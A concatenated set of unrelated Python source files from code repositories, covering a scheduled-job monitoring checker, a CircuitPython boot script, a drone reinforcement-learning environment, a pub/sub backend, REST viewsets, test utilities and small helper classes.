f"check_execution_on_time(): {model_name} {schedulable.name} with schedule {schedulable.schedule} has cron expression '{cron_expr}'")
try:
entry = CronTab(cron_expr)
except Exception as ex:
logger.exception(f"Can't parse cron expression '{cron_expr}'")
raise ex
utc_now = timezone.now()
negative_previous_execution_seconds_ago = entry.previous(
default_utc=True)
if negative_previous_execution_seconds_ago is None:
logger.info('check_execution_on_time(): No expected previous execution, returning')
return None
previous_execution_seconds_ago = -(negative_previous_execution_seconds_ago or 0.0)
if previous_execution_seconds_ago < MIN_DELAY_BETWEEN_EXPECTED_AND_ACTUAL_SECONDS:
logger.info('check_execution_on_time(): Expected previous execution too recent, returning')
return None
expected_datetime = (utc_now - timedelta(seconds=previous_execution_seconds_ago) + timedelta(
microseconds=500000)).replace(microsecond=0)
if expected_datetime < schedulable.schedule_updated_at:
logger.info(
f"check_execution_on_time(): Previous execution expected to start at at {expected_datetime} but that is before the schedule was last updated at {schedulable.schedule_updated_at}")
return None
logger.info(
f"check_execution_on_time(): Previous execution was supposed to start {previous_execution_seconds_ago / 60} minutes ago at {expected_datetime}")
with transaction.atomic():
mse = self.check_executed_at(schedulable, expected_datetime)
else:
m = Schedulable.RATE_REGEX.match(schedule)
if m:
n = int(m.group(1))
time_unit = m.group(2).lower().rstrip('s')
logger.info(
f"{model_name} {schedulable.name} with schedule {schedulable.schedule} has rate {n} per {time_unit}")
relative_delta = self.make_relative_delta(n, time_unit)
utc_now = timezone.now()
expected_datetime = utc_now - relative_delta
if expected_datetime < schedulable.schedule_updated_at:
logger.info(
f"check_execution_on_time(): Previous execution expected after {expected_datetime} but that is before the schedule was last updated at {schedulable.schedule_updated_at}")
return None
logger.info(
f"check_execution_on_time(): Previous execution was supposed to start executed after {expected_datetime}")
with transaction.atomic():
mse = self.check_executed_after(schedulable,
expected_datetime, relative_delta, utc_now)
else:
raise Exception(f"Schedule '{schedule}' is not a cron or rate expression")
if mse:
self.send_alerts(mse)
return mse
def check_executed_at(self, schedulable: BoundSchedulable,
expected_datetime: datetime) -> Optional[MissingScheduledExecution]:
model_name = self.model_name()
mse = self.missing_scheduled_executions_of(schedulable).filter(
expected_execution_at=expected_datetime).first()
if mse:
logger.info(
f"check_executed_at(): Found existing matching missing scheduled execution {mse.uuid}, not alerting")
return None
logger.info('check_executed_at(): No existing matching missing scheduled execution found')
pe = self.executions_of(schedulable).filter(
started_at__gte=expected_datetime - timedelta(seconds=MAX_EARLY_STARTUP_SECONDS),
started_at__lte=expected_datetime + timedelta(seconds=MAX_STARTUP_SECONDS)).first()
if pe:
logger.info(
f"check_execution_on_time(): Found execution of {model_name} {schedulable.uuid} within the expected time window")
return None
logger.info(
f"check_executed_at(): No execution of {model_name} {schedulable.uuid} found within the expected time window")
if schedulable.max_concurrency and \
(schedulable.max_concurrency > 0):
concurrency = schedulable.concurrency_at(expected_datetime)
if concurrency >= schedulable.max_concurrency:
logger.info(
f"check_executed_at(): {concurrency} concurrent executions of execution of {model_name} {schedulable.uuid} during the expected execution time prevented execution")
return None
mse = self.make_missing_scheduled_execution(schedulable, expected_datetime)
mse.save()
return mse
def check_executed_after(self, schedulable: BoundSchedulable,
expected_datetime: datetime, relative_delta: relativedelta,
utc_now: datetime):
model_name = self.model_name()
mse = self.missing_scheduled_executions_of(schedulable).order_by('-expected_execution_at').first()
if mse:
next_expected_execution_at = mse.expected_execution_at + relative_delta
if next_expected_execution_at >= expected_datetime:
logger.info(
f"check_executed_after(): Found existing missing scheduled execution {mse.uuid} expected at {mse.expected_execution_at}, next expected at {next_expected_execution_at}, not alerting")
return None
else:
logger.info(
f"check_executed_after(): No existing missing scheduled execution instances for {model_name} {schedulable.uuid}")
pe = self.executions_of(schedulable).filter(
started_at__gte=expected_datetime - timedelta(seconds=MAX_EARLY_STARTUP_SECONDS),
started_at__lte=utc_now).first()
if pe:
logger.info(
f"check_executed_after(): Found execution of {model_name} {schedulable.uuid} after the expected time")
return None
logger.info(
f"check_executed_after(): No execution of {model_name} {schedulable.uuid} found after expected time")
if schedulable.max_concurrency and \
(schedulable.max_concurrency > 0):
concurrency = schedulable.concurrency_at(expected_datetime)
if concurrency >= schedulable.max_concurrency:
logger.info(
f"check_executed_after(): {concurrency} concurrent executions of execution of {model_name} {schedulable.uuid} during the expected execution time prevent execution")
return None
mse = self.make_missing_scheduled_execution(schedulable, expected_datetime)
mse.save()
return mse
@staticmethod
def make_relative_delta(n: int, time_unit: str) -> relativedelta:
if time_unit == 'second':
return relativedelta(seconds=n)
if time_unit == 'minute':
return relativedelta(minutes=n)
if time_unit == 'hour':
return relativedelta(hours=n)
if time_unit == 'day':
return relativedelta(days=n)
if time_unit == 'month':
return relativedelta(months=n)
if time_unit == 'year':
return relativedelta(years=n)
raise Exception(f"Unknown time unit '{time_unit}'")
def send_alerts(self, mse) -> None:
details = self.missing_scheduled_execution_to_details(mse, context_with_request())
for am in mse.schedulable_instance.alert_methods.filter(
enabled=True).exclude(error_severity_on_missing_execution='').all():
severity = am.error_severity_on_missing_execution
mspea = self.make_missing_execution_alert(mse, am)
mspea.save()
epoch_minutes = divmod(mse.expected_execution_at.timestamp(), 60)[0]
grouping_key = f"missing_scheduled_{self.model_name().replace(' ', '_')}-{mse.schedulable_instance.uuid}-{epoch_minutes}"
try:
result = am.send(details=details, severity=severity,
summary_template=self.alert_summary_template(),
grouping_key=grouping_key)
mspea.send_result = result
mspea.send_status = AlertSendStatus.SUCCEEDED
mspea.completed_at = timezone.now()
except Exception as ex:
logger.exception(f"Failed to send alert for missing execution of {mse.schedulable_instance.uuid}")
mspea.send_status = AlertSendStatus.FAILED
mspea.error_message = str(ex)[:Alert.MAX_ERROR_MESSAGE_LENGTH]
mspea.save()
@abstractmethod
def model_name(self) -> str:
pass
@abstractmethod
def manager(self):
pass
@abstractmethod
def missing_scheduled_executions_of(self, schedulable: BoundSchedulable):
pass
@abstractmethod
def executions_of(self, schedulable: BoundSchedulable):
pass
@abstractmethod
def make_missing_scheduled_execution(self, schedulable: BoundSchedulable,
expected_execution_at: datetime) -> MissingScheduledExecution:
pass
@abstractmethod
def missing_scheduled_execution_to_details(self,
mse: MissingScheduledExecution, context) -> dict:
pass
@abstractmethod
def make_missing_execution_alert(self, mse: MissingScheduledExecution,
alert_method: AlertMethod) -> Alert:
pass
@abstractmethod
def alert_summary_template(self) -> str:
pass
| 2.203125
| 2
|
e1.5/boot.py
|
vwallen/hcde539-a2020
| 0
|
12783532
|
<gh_stars>0
import board
import digitalio
import storage
import os
# Make the file system writable
# Via: https://learn.adafruit.com/circuitpython-essentials/circuitpython-storage
# If the switch pin is connected to ground CircuitPython can write to the drive
# Also used this to re-enable writing after a bad boot.py edit:
# https://learn.adafruit.com/cpu-temperature-logging-with-circuit-python/writing-to-the-filesystem
switch = digitalio.DigitalInOut(board.D7)
switch.direction = digitalio.Direction.INPUT
switch.pull = digitalio.Pull.UP
# This allows both the host system and python to write to the file system
# This is "dangerous" for unspecified reasons, so let's jump the canyon
storage.remount("/", readonly=False, disable_concurrent_write_protection=True)
| 3.15625
| 3
|
script/env_sds_ddpg_cont.py
|
cyberphantom/Selfie-Drone-Stick
| 2
|
12783533
|
<filename>script/env_sds_ddpg_cont.py
#!/usr/bin/env python
import time
import numpy as np
import pandas
import rospy
import tf
import cv2, os
from cv_bridge import CvBridge, CvBridgeError
from geometry_msgs.msg import Twist, Vector3Stamped, Pose, PoseWithCovarianceStamped
from sensor_msgs.msg import CompressedImage, Image
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.msg import ModelState
from hector_uav_msgs.msg import Altimeter
from sensor_msgs.msg import Imu
from std_msgs.msg import Empty
from std_msgs.msg import String
import gym
from gym import utils, spaces
from gym.utils import seeding
from gym.envs.registration import register
from lib.gazebo_connection import GazeboConnection
from face_human_detection_tracking_agent.dunet.droset_person_od import person_detector
from lib.helper import *
from lib.sds_cmd import cmdVel
import math
import random
reg = register(
id='sds_ddpg_cont-v0',
entry_point='env_sds_ddpg_cont:envi',
# timestep_limit=100,
)
class envi(gym.Env):
def __init__(self):
# Gazebo
self.g_set_state = rospy.ServiceProxy("/gazebo/set_model_state", SetModelState)
# Publishing Nodes must be initialized before the environment
self.takeoff_pub = rospy.Publisher('/drone/takeoff', Empty, queue_size=0)
self.vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=5)
self.obs_pos = rospy.Publisher('/obs/pos', Pose, queue_size=5, latch=True)
self.pos_pub = rospy.Publisher("/initialpose", PoseWithCovarianceStamped, latch=True)
# comment in training
self.sds_pub = rospy.Publisher("/sds/image_raw", Image, queue_size=10)
        # Get env. parameters from the yaml file
self.max_alt = rospy.get_param("/alt_TH/max")
self.min_alt = rospy.get_param("/alt_TH/min")
self.yawMin = rospy.get_param("/yaw_TH/min")
self.yawMax = rospy.get_param("/yaw_TH/max")
self.ratioMin = rospy.get_param("/ratio_TH/min")
self.ratioMax = rospy.get_param("/ratio_TH/max")
self.f_W = rospy.get_param("/input_frame_size/w")
self.f_H = rospy.get_param("/input_frame_size/h")
self.step_dur = rospy.get_param("/step_duration")
self.fail_sec_detect_TH = rospy.get_param("/failed_sec_detect_TH")
self.steps_TH = rospy.get_param("/stepsTH")
self.nactions = rospy.get_param("/nactions")
#self.initPose.orientation.w = rospy.get_param('/init_state/ow')
self.initPose = Pose()
        # Desired position based on the target that is specified by the phone
self.g_yaw = None
self.g_cx = None
self.g_cy = None
self.g_ratio = None
        # Carefully discretize the drone world
self.div_yaw = ((abs(self.yawMax) + abs(self.yawMin))/ 0.39)
self.div_w = ((self.f_W+80) / 80)
self.div_h = ((self.f_H+60) / 60)
self.div_ratio = (self.ratioMax + self.ratioMin)/ 0.04
        # Discretize the states (observations)
        # The number of possible states is huge, so to simplify the situation we
        # discretize the space into [13, 17, 13, 9] bins
self.yaw_bins = pandas.cut([self.yawMin, self.yawMax], bins=self.div_yaw, retbins=True)[1] # 8 bins
self.cx_bins = pandas.cut([-40, 680], bins=self.div_w, retbins=True)[1][1:-1] # 8 bins
self.cy_bins = pandas.cut([-30, 390], bins=self.div_h, retbins=True)[1][1:-1] # 6 bins
self.ratio_bins = pandas.cut([self.ratioMin, self.ratioMax], bins=self.div_ratio, retbins=True)[1] # 7 bins
# In __init__ we establish a connection to gazebo
self.gazebo = GazeboConnection()
self.bridge = CvBridge()
self.dunet = person_detector()
self.action_space = spaces.Discrete(self.nactions)
#self._seed()
self.rate = rospy.Rate(10) # 10Hz = 1/10 = 0.1 sec or 10 times/s
self.drone_status = None
# Reset observation and reward variables
self.failure_detect_Count = 0
self.reset_bined_obs = []
self.stepCount = 0
self.reward = 0
self.drone_shot = 0
self.drone_shot_count = 0
self.done = False
self.end = False
self.bbx, self.imu, self.drone_yaw = [], None, None
self.img, self.box_ratio, self.box_centroid = None, None, None
self.bined_obs, self.prev_bined_obs, self.distXY, self.prev_distXY = [], [], None, None
self.x1, self.x2, self.y1, self.y2 = None, None, None, None
def _reset(self):
# Reset observation and reward variables
self.box_ratio, self.box_centroid = None, None
self.reset_bined_obs = []
self.failure_detect_Count = 0
self.stepCount = 0
self.drone_shot_count = 0
self.reward = 0
self.done = False
self.end = False
#tar_pos = [[5, 6, 4, 2], [4, 4, 4, 2], [3, 2, 4, 3]]
tar_pos = [[5, 6, 4, 2], [3, 2, 4, 3]]
target = random.randint(0, 1) # Don't forget to change here
self.bined_goal = tar_pos[target]
# Reset every step too!
self.bbx, self.drone_yaw = [], None
self.box_ratio, self.box_centroid = None, None
self.bined_obs, self.prev_bined_obs, self.distXY, self.prev_dist = [], [], None, None
self.x1, self.x2, self.y1, self.y2 = None, None, None, None
        # Corrected: Takeoff only happens once
if self.drone_status is None:
while (self.takeoff_pub.get_num_connections() != 0):
try:
self.takeoff_sequence()
self.drone_status = "tookoff"
rospy.loginfo("Taking off completed")
break
except:
rospy.loginfo("No subscribers to Takeoff yet, so we wait and try again")
else:
self.reset_pos()
self.send_up_cmd()
while len(self.reset_bined_obs) == 0:
try:
self.reset_bined_obs = self.observe()
self.reset_bined_obs = self.observe()
except:
rospy.loginfo("Getting observation again!")
return self.reset_bined_obs+self.bined_goal
def _step(self, action):
self.stepCount += 1
self.reward = 0.0
# Reset every step
self.bbx, self.imu, self.drone_yaw = [], None, None
self.img, self.box_ratio, self.box_centroid = None, None, None
obs_count = 0
cmd_vel = cmdVel(action, self.drone_speed)
self.prev_bined_obs = self.bined_obs
self.vel_pub.publish(cmd_vel)
self.vel_pub.publish(cmd_vel)
time.sleep(0.2)
self.vel_pub.publish(cmdVel(0, 1))
self.vel_pub.publish(cmdVel(0, 1))
time.sleep(0.1)
#time.sleep(self.step_dur)
self.bined_obs = []
self.x1, self.x2, self.y1, self.y2 = None, None, None, None
while len(self.bined_obs) == 0 and obs_count <= self.fail_sec_detect_TH:
try:
self.bined_obs = self.observe()
obs_count += 1
except:
rospy.loginfo("Getting observation again - Step!")
# Get the reward and see if we reach the goal
self.reward_function()
return self.bined_obs+self.bined_goal, self.reward, self.done, [self.drone_shot, self.end]
def reward_function(self):
goal_reward = 1 # points
fail_reward = 1 # points
if len(self.bined_obs) != 0 or len(self.prev_bined_obs) != 0:
if len(self.bined_obs) == 0:
print("previous", self.prev_bined_obs, "current", self.bined_obs)
#self.bined_obs = self.prev_bined_obs
self.reward = -1.0
#self.done = True
self.end = True
if self.x1 < 5 or self.y1 < 5 or self.x2 > 635 or self.y2 > 355:
self.reward = -1.0
# self.done = True
self.end = True
else:
# if self.stepCount <= self.steps_TH:
diff0 = abs(self.bined_goal[0] - self.bined_obs[0])
diff1 = abs(self.bined_goal[1] - self.bined_obs[1])
diff2 = abs(self.bined_goal[2] - self.bined_obs[2])
diff3 = abs(self.bined_goal[3] - self.bined_obs[3])
# self.reward = -(((float(diff0) / 8.0) + (float(diff1) / 8.0) + (float(diff2) / 6.0) +
# (float(diff3) / 7.0)) / 4.0)
if diff0 > 1:
self.reward -= ((float(diff0) * 21.0) / 168.0) / 4.0
elif diff0 == 1:
self.reward += 0.0
elif diff0 == 0:
self.reward += 0.1
if diff1 > 1:
self.reward -= ((float(diff1) * 21.0) / 168.0) / 4.0
elif diff1 == 1:
self.reward += 0.0
elif diff1 == 0:
self.reward += 0.1
if diff2 > 1:
self.reward -= ((float(diff2) * 28.0) / 168.0) / 4.0
elif diff2 == 1:
self.reward += 0.0
elif diff2 == 0:
self.reward += 0.1
if diff3 > 1:
self.reward -= ((float(diff3) * 24.0) / 168.0) / 4.0
elif diff3 == 1:
self.reward += 0.0
elif diff3 == 0:
self.reward += 0.1
if diff0 == 0 and diff1 == 0 and diff2 == 0 and diff3 == 0:
self.reward = 1.0
self.drone_shot += 1
# self.drone_shot_count += 1
# if self.drone_shot_count == 2:
self.done = True
# if self.stepCount == self.steps_TH:
# self.done = True
# return observation either [] or [Drone_Yaw, bbx_centroid.x, bbx_centroid.y, bbx_ratio]
def observe(self):
self.imu = None
while self.imu is None:
try:
self.imu = rospy.wait_for_message('/drone/imu', Imu, timeout=5)
self.drone_yaw = self.process_imu()
except:
rospy.loginfo("Current drone Imu is not ready yet, retrying for getting phone IMU")
self.img = None
while self.img is None:
try:
self.img = rospy.wait_for_message('/drone/front_camera/image_raw', Image, timeout=1)
except:
rospy.loginfo("Current drone Image is not ready yet")
if self.img is not None:
frame = self.bridge.imgmsg_to_cv2(self.img, "bgr8")
ready_image = frame.copy()
self.bbx = self.dunet.run_detect(ready_image)
if len(self.bbx) !=0:
self.box_ratio, self.box_centroid, self.x1, self.y1, self.x2, self.y2 = bounding_box_DUNET(self.f_W, self.f_H, self.bbx)
'''[Drone_Yaw, bbx_centroid.x, bbx_centroid.y, bbx_ratio]'''
obs = [self.drone_yaw, self.box_centroid[0], self.box_centroid[1], self.box_ratio]
self.bined_obs = [self.to_bin(obs[0], self.yaw_bins), self.to_bin(obs[1], self.cx_bins),
self.to_bin(obs[2], self.cy_bins), self.to_bin(obs[3], self.ratio_bins)]
else:
self.bined_obs = []
return self.bined_obs
def takeoff_sequence(self, seconds_taking_off=1.0):
# Before taking off, make sure that cmd_vel is not null to avoid drifts.
self.vel_pub.publish(cmdVel(0, 1))
self.takeoff_pub.publish(Empty())
time.sleep(seconds_taking_off)
def process_imu(self):
if self.imu is not None:
euler = tf.transformations.euler_from_quaternion(
[self.imu.orientation.x, self.imu.orientation.y, self.imu.orientation.z, self.imu.orientation.w]
)
# roll = euler[0]
# pitch = euler[1]
yaw = euler[2]
return yaw
# Arange Value based on bins: return indices
def to_bin(self, value, bins):
return np.digitize(x=[value], bins=bins)[0]
# Random Number Generator, used by the learning algorithm when generating random actions
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
# Go up and wait for 1 sec
def send_up_cmd(self):
self.vel_pub.publish(cmdVel(5, 1)) # 5
time.sleep(0.8)
self.vel_pub.publish(cmdVel(0, 1))
time.sleep(0.5)
# Reset position
def reset_pos(self):
state = ModelState()
state.model_name = "sjtu_drone"
# Define Initial position for _reset
# init_pos = [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.4, -2.9, 0.0, 0.0, 0.0, 0.0], [-1.65, 1.8, 0.0, 0.0, 0.0, 0.0]]
init_pos = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
# p = random.randint(0, 2)
self.initPose.position.x = init_pos[0]
self.initPose.position.y = init_pos[1]
self.initPose.position.z = init_pos[2]
self.initPose.orientation.x = init_pos[3]
self.initPose.orientation.y = init_pos[4]
self.initPose.orientation.z = init_pos[5]
self.initPose.orientation.w = 0.0
state.pose = self.initPose
ret = self.g_set_state(state)
loc = PoseWithCovarianceStamped()
loc.pose.pose = self.initPose
loc.header.frame_id = "/map"
self.pos_pub.publish(loc)
self.pos_pub.publish(loc)
self.pos_pub.publish(loc)
| 1.820313
| 2
|
anypubsub/backends/memory.py
|
smarzola/anypubsub
| 6
|
12783534
|
<filename>anypubsub/backends/memory.py
from collections import defaultdict
from anypubsub.interfaces import PubSub, Subscriber
from six.moves.queue import Queue
from weakref import WeakSet
class MemorySubscriber(Subscriber):
def __init__(self, queue_factory):
self.messages = queue_factory(maxsize=0)
def __iter__(self):
return self
def next(self):
return self.messages.get(block=True, timeout=None)
__next__ = next # PY3
def put(self, message):
self.messages.put_nowait(message)
class MemoryPubSub(PubSub):
def __init__(self, queue_factory=Queue):
self.subscribers = defaultdict(WeakSet)
self.queue_factory = queue_factory
def publish(self, channel, message):
subscribers = self.subscribers[channel]
for subscriber in subscribers:
subscriber.put(message)
return len(subscribers)
def subscribe(self, *channels):
subscriber = MemorySubscriber(self.queue_factory)
for channel in channels:
self.subscribers[channel].add(subscriber)
return subscriber
backend = MemoryPubSub
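# Hedged usage sketch (illustration only): subscribers are held in a WeakSet, so a
# subscriber stops receiving messages once no strong reference to it remains.
#
#   pubsub = MemoryPubSub()
#   subscriber = pubsub.subscribe('a_channel')
#   pubsub.publish('a_channel', 'hello world')   # returns the number of subscribers notified
#   next(subscriber)                             # -> 'hello world'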
| 2.453125
| 2
|
LED-control/software/scripts/setoff.py
|
jeremywrnr/life-of-the-party
| 1
|
12783535
|
import liblo
import time
addresses = [liblo.Address("192.168.1.3","2222"),liblo.Address("192.168.1.4","2222"),liblo.Address("192.168.1.5","2222"),liblo.Address("192.168.1.6","2222"),liblo.Address("192.168.1.7","2222"),liblo.Address("192.168.1.8","2222"),liblo.Address("192.168.1.9","2222"),liblo.Address("192.168.1.10","2222"),liblo.Address("192.168.1.11","2222"),liblo.Address("192.168.1.12","2222"),liblo.Address("192.168.1.13","2222"),liblo.Address("192.168.1.14","2222"),liblo.Address("192.168.1.15","2222"),liblo.Address("192.168.1.16","2222"),liblo.Address("192.168.1.17","2222")]
r=0
g=0
b=0
for address in addresses:
liblo.send(address,'22',('f', r),('f', g),('f', b))
| 2.09375
| 2
|
tests/utils/utils.py
|
bossjones/ultron8
| 0
|
12783536
|
<reponame>bossjones/ultron8<gh_stars>0
import logging
import random
import string
from typing import Dict
import requests
from requests.models import Response
from sqlalchemy.orm import Session
from starlette.testclient import TestClient
from ultron8.api import settings
logger = logging.getLogger(__name__)
def random_lower_string() -> str:
return "".join(random.choices(string.ascii_lowercase, k=32))
def random_email() -> str:
return f"{random_lower_string()}@{random_lower_string()}.com"
def get_server_api() -> str:
server_name = f"http://{settings.SERVER_NAME}"
logger.debug("server_name: '%s'", server_name)
return server_name
def get_server_api_with_version() -> str:
"""Return url w/ api versioning in it. eg. http://localhost:11267/v1
Returns:
str -- url in string format
"""
server_name = f"http://{settings.SERVER_NAME}{settings.API_V1_STR}"
logger.debug("server_name: '%s'", server_name)
return server_name
def get_superuser_jwt_request() -> Response:
server_api = get_server_api()
login_data = {
"username": settings.FIRST_SUPERUSER,
"password": <PASSWORD>.FIRST_<PASSWORD>,
}
r = requests.post(
f"{server_api}{settings.API_V1_STR}/login/access-token", data=login_data
)
return r
def get_superuser_token_headers() -> Dict[str, str]:
r = get_superuser_jwt_request()
tokens = r.json()
a_token = tokens["access_token"]
headers = {"Authorization": f"Bearer {a_token}"}
# superuser_token_headers = headers
return headers
superuser_credentials = [
settings.FIRST_SUPERUSER.encode(),
settings.FIRST_SUPERUSER_PASSWORD.encode(),
]
# TODO: Figure out if we want to use this or not
def get_superuser_token_headers2(client: TestClient) -> Dict[str, str]:
"""Does basically the same as get_superuser_token_headers() only this time it uses the starlette TestClient
Arguments:
client {TestClient} -- [description]
Returns:
Dict[str, str] -- [description]
"""
login_data = {
"username": settings.FIRST_SUPERUSER,
"password": settings.FIRST_SUPERUSER_PASSWORD,
}
r = client.post(f"{settings.API_V1_STR}/login/access-token", data=login_data)
tokens = r.json()
a_token = tokens["access_token"]
headers = {"Authorization": f"Bearer {a_token}"}
return headers
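# Hedged usage sketch (illustration only; "/users" is an assumed example endpoint, not
# necessarily one exposed by this API):
#
#   headers = get_superuser_token_headers()
#   r = requests.get(f"{get_server_api_with_version()}/users", headers=headers)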
| 2.34375
| 2
|
src/v1/views.py
|
Diaga/Spekit_Tech_Project
| 0
|
12783537
|
<reponame>Diaga/Spekit_Tech_Project
from rest_framework.viewsets import GenericViewSet, mixins
from . import models
from . import serializers
from . import filters
class TopicViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.ListModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin):
queryset = models.Topic.objects.all()
serializer_class = serializers.TopicSerializer
class FolderViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.ListModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin):
queryset = models.Folder.objects.all()
serializer_class = serializers.FolderSerializer
filterset_class = filters.FolderFilter
class DocumentViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.ListModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin):
queryset = models.Document.objects.all()
serializer_class = serializers.DocumentSerializer
filterset_class = filters.DocumentFilter
class FolderTopicViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.DestroyModelMixin):
queryset = models.FolderTopic.objects.all()
serializer_class = serializers.FolderTopicSerializer
class DocumentTopicViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.DestroyModelMixin):
queryset = models.DocumentTopic.objects.all()
serializer_class = serializers.DocumentTopicSerializer
| 1.96875
| 2
|
src/datasets/dataset_student.py
|
oscareriksson/FedML-master-thesis
| 0
|
12783538
|
<filename>src/datasets/dataset_student.py
from torch.utils.data import Dataset
class StudentData(Dataset):
def __init__(self, dataset):
self.dataset = dataset
def __getitem__(self, index):
if isinstance(index, list):
data, _ = self.dataset[[i for i in index]]
else:
data, _ = self.dataset[index]
return data, index
def __len__(self):
"""Total number of samples"""
return len(self.dataset)
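# Hedged usage sketch (illustration only): wrap any (data, label) torch Dataset so that
# indexing returns (data, index) instead, e.g. for looking up teacher predictions by index:
#
#   student_data = StudentData(base_dataset)   # base_dataset: any torch Dataset
#   x, idx = student_data[0]                   # labels are dropped, the index is returned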
| 3
| 3
|
shfl/differential_privacy/probability_distribution.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
| 2
|
12783539
|
import numpy as np
import abc
class ProbabilityDistribution(abc.ABC):
"""
Class representing the interface for a probability distribution
"""
@abc.abstractmethod
def sample(self, size):
"""
This method must return an array with length "size", sampling the distribution
# Arguments:
size: Size of the sampling
"""
class NormalDistribution(ProbabilityDistribution):
"""
Implements Normal Distribution
# Arguments:
mean: Mean of the normal distribution.
std: Standard deviation of the normal distribution
"""
def __init__(self, mean, std):
self._mean = mean
self._std = std
def sample(self, size):
"""
        This method provides a sample of the given size from a Gaussian distribution
# Arguments:
size: size of the sample
# Returns:
Sample of a gaussian distribution of a given size
"""
return np.random.normal(self._mean, self._std, size)
class GaussianMixture(ProbabilityDistribution):
"""
Implements the combination of Normal Distributions
# Arguments:
params: Array of arrays with mean and std for every gaussian distribution.
weights: Array of weights for every distribution with sum 1.
# Example:
```python
# Parameters for two Gaussian
mu_M = 178
mu_F = 162
sigma_M = 7
sigma_F = 7
# Parameters
norm_params = np.array([[mu_M, sigma_M],
[mu_F, sigma_F]])
weights = np.ones(2) / 2.0
# Creating combination of gaussian
distribution = GaussianMixture(norm_params, weights)
```
"""
def __init__(self, params, weights):
self._gaussian_distributions = []
for param in params:
self._gaussian_distributions.append(NormalDistribution(param[0], param[1]))
self._weights = weights
def sample(self, size):
"""
        This method provides a sample of the given size from a mixture of Gaussian distributions
# Arguments:
size: size of the sample
# Returns:
Sample of a mixture of gaussian distributions of a given size
"""
mixture_idx = np.random.choice(len(self._weights), size=size, replace=True, p=self._weights)
values = []
for i in mixture_idx:
gaussian_distributions = self._gaussian_distributions[i]
values.append(gaussian_distributions.sample(1))
return np.fromiter(values, dtype=np.float64)
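# Hedged usage sketch (illustration only, continuing the GaussianMixture docstring example):
#
#   distribution = GaussianMixture(norm_params, weights)
#   heights = distribution.sample(1000)     # 1000 draws from the two-component mixture
#   heights.mean()                          # roughly (mu_M + mu_F) / 2 for equal weights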
| 3.890625
| 4
|
service/user_service.py
|
LianGee/galio
| 8
|
12783540
|
<filename>service/user_service.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : user_service.py
# @Author: zaoshu
# @Date : 2020-02-10
# @Desc :
import json
from common.exception import ServerException
from model.user import User
class UserService:
@classmethod
def get_user_from_cas_resp(cls, response) -> User:
resp = json.loads(response.text).get('serviceResponse')
if resp.get('authenticationFailure'):
raise ServerException(msg=f"{resp.get('authenticationFailure').get('description')}")
else:
attributes = resp.get('authenticationSuccess').get('attributes')
return User(
**attributes.get('user')
)
| 2.453125
| 2
|
core/app/models/point.py
|
bitreport-org/Bitreport
| 3
|
12783541
|
<reponame>bitreport-org/Bitreport
class Point:
info = None
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return f"Point({self.x}, {self.y}), {self.info}"
def __eq__(self, other):
return (self.x == other.x) and (self.y == other.y)
def __hash__(self):
return hash((self.x, self.y))
def add_info(self, info: str):
self.info = info
| 3.046875
| 3
|
GoogleAppEngine_Side/main.py
|
nickolyamba/android-chem-app
| 0
|
12783542
|
<filename>GoogleAppEngine_Side/main.py
import webapp2
from google.appengine.api import oauth
config = {'Root':'default'}
app = webapp2.WSGIApplication([
('/supplier', 'supplier.Supplier'),
('/chemical', 'chemical.Chemical'),
('/solution', 'solution.Solution'),
('/signin', 'signin.GetToken'),
], debug=True)
# Source: lecture + reading
# https://webapp-improved.appspot.com/guide/routing.html#guide-routing
# [0-9]+ matches one or more digits, /? matches 0 or 1 '/'
# : is given after name, <> place for regex
app.router.add(webapp2.Route(r'/supplier/<id:[0-9]+>', 'supplier.Supplier'))
app.router.add(webapp2.Route(r'/supplier/<id:[a-zA-Z-]*>', 'supplier.SupplierSearch'))
#app.router.add(webapp2.Route(r'/supplier/search', 'supplier.SupplierSearch'))
app.router.add(webapp2.Route(r'/chemical/<cid:[a-zA-Z0-9]*><:/+><:[a-zA-Z]*><:/*><sid:[a-zA-Z0-9]*>', 'chemical.ChemicalSupplier'))
app.router.add(webapp2.Route(r'/chemical/<cid:[a-zA-Z0-9]+>', 'chemical.EditDeleteChem'))
app.router.add(webapp2.Route(r'/solution/<id:[0-9]+>', 'solution.Solution'))
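# Hedged examples (illustration only) of URLs the routes above are intended to match:
#   /supplier/42                      -> supplier.Supplier         (id='42')
#   /supplier/acme-labs               -> supplier.SupplierSearch   (id='acme-labs')
#   /chemical/abc123/supplier/xyz789  -> chemical.ChemicalSupplier (cid='abc123', sid='xyz789')
#   /chemical/abc123                  -> chemical.EditDeleteChem   (cid='abc123')
#   /solution/7                       -> solution.Solution         (id='7')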
| 2.765625
| 3
|
morphodynamics/landscapes/analysis/save_ims.py
|
hcbiophys/morphodynamics
| 1
|
12783543
|
import tensorflow as tf
import numpy as np
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import copy
from morphodynamics.landscapes.utils import get_meshgrid
from morphodynamics.landscapes.analysis.get_fields import *
from morphodynamics.landscapes.analysis.sde_forward import *
class Save_Ims():
"""
Save losses during training and the potential as an array
"""
def __init__(self, model, save_dir):
"""
- model: this is the physics-informed neural network (PINN)
- save_dir: where to save the plot and potential to
"""
self.model = model
self.save_dir = save_dir
x_test, y_test = get_meshgrid(model.xlims, model.ylims, model.dims, flatBool = True)
self.x_test , self.y_test = tf.convert_to_tensor(x_test), tf.convert_to_tensor(y_test)
self.fig = plt.figure(figsize = (30, 20))
self.gs = gridspec.GridSpec(nrows = 15, ncols = 17)
def __call__(self):
self._plot_losses()
self._plot_pdfs_getUandD()
self._plot_and_save_U()
#plt.savefig(self.save_dir + 'View_{}_{}.png'.format(self.model.save_append, self.model.idx_save))
#plt.close()
